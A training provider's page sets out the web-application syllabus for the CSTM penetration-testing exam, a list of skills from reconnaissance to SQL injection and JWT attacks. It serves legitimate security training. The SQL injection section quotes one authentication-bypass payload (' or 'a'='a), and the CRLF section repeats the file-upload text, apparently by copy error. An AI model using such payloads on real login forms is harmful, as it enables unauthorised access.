This article highlights the key areas of web technologies you need to understand to pass the CSTM exam. Our full syllabus can be found on our website showing all key areas of knowledge for CSTM. The Cyber Scheme‘s CSTM training maps the CSTM syllabus and will give you the confidence to sit our NCSC-accredited exam knowing the topics and knowledge domains that are likely to come up.
Book here for our CSTM training
Web Servers
- Can identify web servers on a target network and can remotely determine their type and version.
- Has knowledge of vulnerabilities in the following common application frameworks, servers and technologies:
• .NET • J2EE • Coldfusion • Ruby on Rails • NodeJS
- Understands the purpose, operation, limitation and security attributes of web proxy servers.
- Can understand the concepts of virtual hosting and web proxies.
- Understands and can demonstrate the remote exploitation of web servers.
Reconnaissance
- Can use spidering tools and understands their relevance in a web application test for discovering linked content.
- Understands and can demonstrate forced browsing techniques to discover default or unlinked content.
- Can identify functionality within client-side code.
Protocols and Methods
Can understand:
- All HTTP methods and response codes.
- HTTP Header fields relating to security features.
- Can demonstrate the use of web protocols, including:
• HTTP • HTTPS • Web Sockets.
Languages
- Understands common web mark-up and programming languages, including:
• .NET • ASP Classic • Perl • PHP • JSP • Python • JavaScript
- Understands and can demonstrate how the insecure implementationof software developed using these languages can be exploited(candidate may select two languages).
APIs
Can understand the following:
- Understands and can demonstrate the use of web-based APIs to remotely access remote services.
- The use of tools and techniques to identify new OS and software vulnerabilities.
- Common authentication techniques used in web APIs, e.g. API keys.
- Can demonstrate the use of relevant tools to test APIs, e.g. SoapUI and Postman.
- Understands and can demonstrate how the insecure implementation of web-based APIs can be exploited.
- Different common payload formats such as XML and JSON.
- How to interpret definition files, e.g. WSDL and Swagger.
Information Gathering
- Can gather information from a web site and application mark-up or programming language, including:
• hidden form fields • database connection strings • user account credentials • developer comments
• external and/or authenticated-only URLs.
- Can gather information about a web site and application from the error messages it generates.
Authentication
- Understands common authentication vulnerabilities, including:
• Transport of credentials over an unencrypted channel
• Testing for username enumeration • Brute-force testing • Authentication bypass
• Session hijacking • Insecure password reset features • Insufficient logout timeout/functionality
• Vulnerable CAPTCHA controls • Race Conditions • Lack of MFA
Authorisation
- Understands common pitfalls associated with the design and implementation of application authorisation mechanisms.
Input Validation
- Understands the importance of input validation and how it can be implemented, e.g. allow-lists, deny-lists and regular expressions.
- Can understand the need for server-side validation and the flaws associated with client-side validation.
Fuzzing
- Understands fuzzing and its use in web application testing.
Cross Site Scripting
- Can Understand cross-site-scripting (XSS) and can demonstrate the launching of a successful XSS attack.
- Understands the difference between persistent (stored) and reflected XSS.
SQL Injection
- Exploiting UNION based injection.
- Identifying SQL injection.
- Exploiting auth bypass (‘ or ‘a’=’a).
- Exploiting SQL injection to execute operating system commands or read files.
Blind SQL Injection
- Can determine the existence of a blind SQL injection condition in a web application.
- Can exploit a blind SQL injection vulnerability.
Sessions
- Identifying JWTs.
- Understanding the difference between HMAC and public key JWTs.
- Understands and can exploit session fixation vulnerabilities.
- Exploiting “none” signature or lack of signature checking in JWTs.
- Understands the security implications of session IDs exposed in URLs.
- Can identify the session control mechanism used within a web application.
- Understands the role of sessions in CSRF attacks.
Cryptography
- Understands how cryptography can be used to protect data in transit and data at rest, both on the server and client side.
- Identification and exploitation of encoded values (e.g. Base64).
- Understands the concepts of TLS and can determine whether a TLS-enabled web server has been configured in compliance with best practice (i.e. it supports recommended ciphers and key lengths).
- Identification and exploitation of cryptographic values (e.g. MD5 hashes).
Directory Traversal
- Can understand and identify directory traversal vulnerabilities within applications.
File Uploads
- Understands and can identify common vulnerabilities with file upload capabilities within applications.
- Can generate malicious payloads in a variety of common file formats.
- Understands the role of MIME types in relation to file upload features.
CRLF Attacks
- Can generate malicious payloads in a variety of common file formats.
Application Logic Flaws
- Can assess and exploit vulnerabilities within the functional logic, function access control and business logic of an application.